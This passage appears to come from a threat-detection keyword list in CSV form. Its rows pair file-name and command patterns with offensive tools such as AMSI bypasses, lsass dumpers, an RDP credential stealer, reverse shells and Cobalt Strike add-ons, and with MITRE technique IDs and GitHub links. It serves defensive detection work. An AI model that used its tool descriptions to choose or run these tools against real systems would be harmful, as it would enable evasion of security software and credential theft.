Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*Amsi-Bypass*,offensive_tool_keyword,Github Username,This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell,1,1,N/A,N/A,10,1325,245,2023-03-01T17:09:02Z,2019-05-14T06:09:25Z -*amsi-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*AmsiBypass.cs*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*Amsi-Killer.exe*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*Amsi-Killer.sln*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*Amsi-Killer.vcxproj*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*Amsi-Killer-master*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*AmsiOpenSession.cpp*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*AmsiOpenSession.sln*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*AmsiOpenSession.vcxproj*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*and Credential Guard will not be bypassed*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*andotp2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*AndrewSpecial.cpp*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*AndrewSpecial.exe*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*AndrewSpecial-master*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*androidbackup2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*androidfde2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*AnErrupTion/LoGiC.NET*,offensive_tool_keyword,LoGiC.NET,A more advanced free and open .NET obfuscator using dnlib,T1001,TA0011,N/A,N/A,Defense Evasion,https://github.com/AnErrupTion/LoGiC.NET,1,1,N/A,N/A,5,483,75,2023-08-23T09:55:54Z,2019-12-27T09:48:50Z -*Anevicon*,offensive_tool_keyword,Anevicon,Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.,T1498 - T1497 - T1496,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/rozgo/anevicon,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ANGRYPUPPY2.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*anonsurf.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*ansible2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*anthemtotheego/Detect-Hooks*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*antirez/hping*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,1,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*AntivirusBypass.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*antiword FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*antonioCoco/ConPtyShell*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*antonioCoco/JuicyPotatoNG*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*antonioCoco/RoguePotato*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*antonioCoco/RunasCs*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*antonioCoco/RunasCs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*antonioCoco/SspiUacBypass*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*anydesk.exe --set-password*,greyware_tool_keyword,anydesk,setting the AnyDesk service password manually,N/A,N/A,N/A,N/A,RMM,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*anypotato.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*aojlhgbkmkahabcmcpifbolnoichfeep*,greyware_tool_keyword,VirtualShield VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*AoratosWin*.zip*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.csproj*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.exe*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.exe*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.git*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.sln*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin_*.zip*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*apache_felix_remote_shell*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*APC_Ijnect_Load.nim*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*apcfdffemoinopelidncddjbhkiblecc*,greyware_tool_keyword,Soul VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*apex2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*apfs_encrypted_volume_passwd.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*APIHookInjectorBin.exe*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*APIHookInjectorBin.log*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*APIHookInjectorBin.pdb*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*APIHookInjectorBin.sln*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*apokryptein/secinject*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*apop2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*appdata*\Windows:svchost.exe*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*appdata*\Windows:winrm.vbs*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*AppData\Roaming\uTorrent*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*applenotes2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Applet_ReverseTCP.jar*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Application.Lazagne.H*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*applocker_enum*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*applocker-enumerator*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*apt install crunch*,offensive_tool_keyword,crunch,Generate a dictionary file containing words with a minimum and maximum length,T1596 - T1596.001,TA0043,N/A,N/A,Credential Access,https://sourceforge.net/projects/crunch-wordlist/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*apt install gpp-decrypt*,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*apt install hyperion*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*apt install polenum*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*apt install set -y*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*apt install wce*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*APT stands for Advanced Persistence Tomato*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*apt* install 